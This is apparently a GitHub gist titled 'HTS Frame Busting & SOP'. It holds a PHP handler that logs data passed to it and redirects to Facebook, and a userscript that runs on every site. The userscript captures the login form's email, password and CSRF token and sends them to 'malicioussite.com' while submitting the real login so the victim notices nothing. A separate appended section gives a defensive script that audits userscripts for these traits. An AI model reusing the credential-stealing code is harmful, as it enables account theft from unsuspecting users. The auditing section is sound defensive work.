@Ninjex
Last active August 29, 2015 14:27
HTS Frame Busting & SOP
<?php
$data = urldecode($_GET['data']);
/***
Do something with data here (log it somehow)
***/
// Make sure you redirect them
header('Location: https://www.facebook.com/');
?>
// ==UserScript==
// @name Test
// @namespace *
// @description Test
// @version 1
// @grant none
// @include http://*
// @include https://*
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js
// ==/UserScript==
var handler = "malicioussite.com/handler.php?data=" // Our server to handle the data passed as $_GET
var xform = document.forms[0] // Just grab the first form (it's the login form in this case)
var action = "/login.php?login_attempt=1" // Where the actual action should be of the form
var a_type = "POST" // The action type of the form
// monitor for an onsubmit action of the login form
xform.onsubmit = function(){
// Grab needed values (lsd is important here, as it's a XSRF token)
email = xform.email.value;
pass = xform.pass.value;
token = xform.lsd.value;
perst = xform.default_persistent.value;
// Prepare our array for the Ajax request
formData = {email: email,
pass: pass,
lsd: token,
default_persistent: perst,
};
data = email + ':' + pass; // What we want to pass to our server
// Change the action to our server and make sure to encode the data
// The server should decode this then use it, otherwise an ampersand splits our data
// and we will not be able to view all of the data (i.e, a password of "lol&kek123" the server would only get "lol")
xform.action = handler + encodeURIComponent(data);
// Perform the Ajax call using jQuery (Don't judge me)
$.ajax({
url: action,
type: a_type,
data: formData
});
}
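
A reviewer-side check for the traits visible in the userscript above (scope covering every http/https page, an `@require` fetched over plain HTTP, a rewrite of a form's `action`, a read of the password field), as an added example that is not part of the gist. The rule names, the heuristics and the `SAMPLE` text are assumptions made here for illustration.

```javascript
// Added example, not from the gist. SAMPLE is constructed; rule names are made up here.
const SAMPLE = [
  "// ==UserScript==",
  "// @name Constructed sample",
  "// @include http://*",
  "// @include https://*",
  "// @require http://cdn.example/lib.js",
  "// ==/UserScript==",
  "var f = document.forms[0];",
  "f.action = somewhereElse;",
  "var p = f.pass.value;",
].join("\n");

const HEADER = /\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/;

// Collect "// @key value" lines from the metadata block into { key: [values] }.
function parseMetadata(source) {
  const meta = Object.create(null);
  const block = source.match(HEADER);
  if (!block) return meta;
  for (const line of block[1].split(/\r?\n/)) {
    const m = line.match(/^\s*\/\/\s*@(\S+)\s*(.*)$/);
    if (m) (meta[m[1]] = meta[m[1]] || []).push(m[2].trim());
  }
  return meta;
}

// Return the list of review findings for one userscript source text.
function auditUserscript(source) {
  const meta = parseMetadata(source);
  const body = source.replace(HEADER, "");
  const findings = [];
  const scopes = [...(meta.include || []), ...(meta.match || [])];
  // A match-everything scope means the script also runs on every login page.
  if (scopes.some(s => /^(\*|https?:\/\/\*\/?\*?|\*:\/\/\*\/\*|<all_urls>)$/.test(s)))
    findings.push("runs-on-all-sites");
  // A dependency fetched over plain HTTP can be replaced in transit.
  if ((meta.require || []).some(u => /^http:\/\//i.test(u)))
    findings.push("insecure-require");
  // Heuristic: assignment to a form's submit target.
  if (/\.action\s*=[^=]/.test(body)) findings.push("rewrites-form-action");
  // Heuristic: reads the value of a field named like a password.
  if (/\.(pass|password|passwd)\.value/i.test(body)) findings.push("reads-password-field");
  return findings;
}

console.log(auditUserscript(SAMPLE));
```

The two body checks are regex heuristics, so an empty result is not proof that a script is safe; treat any finding as a reason to read the script in full before installing it.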